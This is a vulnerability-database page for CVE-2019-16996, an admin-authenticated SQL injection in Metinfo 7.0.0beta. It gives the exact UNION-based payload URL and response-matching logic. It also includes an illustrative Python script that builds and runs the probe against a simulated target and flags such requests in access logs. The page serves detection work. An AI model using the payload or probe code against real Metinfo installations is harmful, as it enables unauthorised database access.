cvebase
CVE-2019-16996
published 2019-09-30


Priority: P2 · 71 · high
CVSS 3.1: 7.2 (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)
Exploited in the wild · public exploit · VulnCheck KEV
EPSS: 12.44% (95.7th percentile)
In Metinfo 7.0.0beta, a SQL Injection was discovered in app/system/product/admin/product_admin.class.php via the admin/?n=product&c=product_admin&a=dopara&app_type=shop id parameter.

Affected

1 range

Vendor     Product    Version range                    Fixed in
metinfo    metinfo    7.0.0beta (from the description)  (not listed)

Detection & IOCs (extracted from sources)

URL:  /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23
Path: app/system/product/admin/product_admin.class.php
  • Send a GET request to the vulnerable endpoint with a UNION-based SQL injection payload in the 'id' parameter; a vulnerable instance returns the arithmetic result '1918835981' (25367*75643) in the response body with HTTP 200. Match on the computed product, not on the literal '25367*75643', which a non-vulnerable page may simply echo back from the request.
  • The vulnerable parameter is 'id' in the GET request to /admin/?n=product&c=product_admin&a=dopara&app_type=shop. Exploitation requires an authenticated admin session: the attack vector is network-based, but the endpoint is not reachable without valid admin credentials (CVSS PR:H).
  • The Nuclei template follows redirects (up to 2 hops) when probing the endpoint, which detection tooling should account for: an unauthenticated probe that is bounced to a login page is inconclusive, not a negative result.
  • The affected version is specifically Metinfo 7.0.0beta; other versions may not be vulnerable.
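The probe and matcher the IOC bullets describe, as an added worked example. This is not cvebase's, Metinfo's or the Nuclei template's code; it rebuilds the exact probe URL quoted above, applies the "HTTP 200 and computed product in the body" match, follows up to two redirect hops the way the template does, and shows the same endpoint-plus-UNION pattern as a rule run over access-log lines. The HTTP client stand-in, the login path it redirects to, the sample responses and the log lines are all constructed for illustration and are not taken from the page.

```python
"""Offline example for the CVE-2019-16996 probe (constructed, not the original
page's or project's code). No network access: a fake fetch() stands in for
the HTTP client so the logic can be exercised end to end."""
import re
from urllib.parse import parse_qs, quote, urlencode, urlsplit

# Endpoint and payload exactly as quoted in the IOC section.
VULN_PATH = "/admin/"
VULN_QUERY = {"n": "product", "c": "product_admin", "a": "dopara", "app_type": "shop"}
PAYLOAD = "1 union SELECT 1,2,3,25367*75643,5,6,7 limit 5,1 #"
# A vulnerable backend evaluates 25367*75643 inside the UNION and echoes the
# product; a page that merely reflects the raw input contains "25367*75643".
MARKER = str(25367 * 75643)  # "1918835981"


def build_probe_url(base: str) -> str:
    """Return the full probe URL for a base like https://host (commas and '*' left
    unencoded so the result matches the IOC URL byte for byte)."""
    params = dict(VULN_QUERY, id=PAYLOAD)
    return base.rstrip("/") + VULN_PATH + "?" + urlencode(params, safe=",*", quote_via=quote)


def looks_vulnerable(status: int, body: str) -> bool:
    """The response match from the IOC: HTTP 200 and the computed product in the body."""
    return status == 200 and MARKER in body


def probe(fetch, url: str, max_hops: int = 2) -> bool:
    """fetch(url) -> (status, body, location_or_None). Follows at most max_hops
    redirects, like the Nuclei template; running out of hops is treated as not
    vulnerable (really: inconclusive, typically an unauthenticated session)."""
    for _ in range(max_hops + 1):
        status, body, location = fetch(url)
        if status in (301, 302, 303, 307, 308) and location:
            url = location
            continue
        return looks_vulnerable(status, body)
    return False


def make_fake_target(authenticated: bool):
    """Constructed stand-in for an HTTP client. Without an admin session the
    admin handler bounces to a login page (hypothetical path, not Metinfo's);
    with one, the injectable handler evaluates the UNION and echoes the marker."""
    def fetch(url):
        if "login" in url:
            return 200, "<form>login</form>", None
        if not authenticated:
            return 302, "", "/admin/login.php"  # hypothetical login path
        if "union" in url.lower():
            return 200, "<td>" + MARKER + "</td>", None
        return 200, "<td>product</td>", None
    return fetch


# Detection side: flag requests to the vulnerable handler whose id carries a UNION ... SELECT.
LOG_RE = re.compile(r'"GET (?P<path>/admin/\?[^ "]*) HTTP/')
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.I)


def flag_access_log(lines):
    """Return the log lines that hit n=product&c=product_admin&a=dopara with an
    injected id. parse_qs percent-decodes, so %20 / %2B tricks do not evade it."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        qs = parse_qs(urlsplit(m.group("path")).query)
        if qs.get("n") == ["product"] and qs.get("c") == ["product_admin"] and qs.get("a") == ["dopara"]:
            if UNION_RE.search(qs.get("id", [""])[0]):
                hits.append(line)
    return hits


# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [30/Sep/2019:10:00:00 +0000] "GET /admin/?n=product&c=product_admin&a=dopara&app_type=shop'
    '&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23 HTTP/1.1" 200 5120',
    '10.0.0.6 - - [30/Sep/2019:10:00:01 +0000] "GET /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=12 HTTP/1.1" 200 4100',
    '10.0.0.7 - - [30/Sep/2019:10:00:02 +0000] "GET /index.php?id=1%20union%20select%201 HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    url = build_probe_url("https://target.example")
    print(url)
    print("authenticated probe  :", probe(make_fake_target(True), url))
    print("unauthenticated probe:", probe(make_fake_target(False), url))
    print("flagged log lines    :", len(flag_access_log(SAMPLE_LOG)))
```

The unauthenticated run returns False after being redirected to the login page, which is the PR:H caveat in practice: a negative from an unauthenticated scanner says nothing about whether the handler is injectable.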

CVSS provenance

Source      Version   Score   Severity   Vector
nvd         v3.1      7.2     HIGH       CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvd         v2.0      6.5     MEDIUM     AV:N/AC:L/Au:S/C:P/I:P/A:P
vulncheck             7.2     HIGH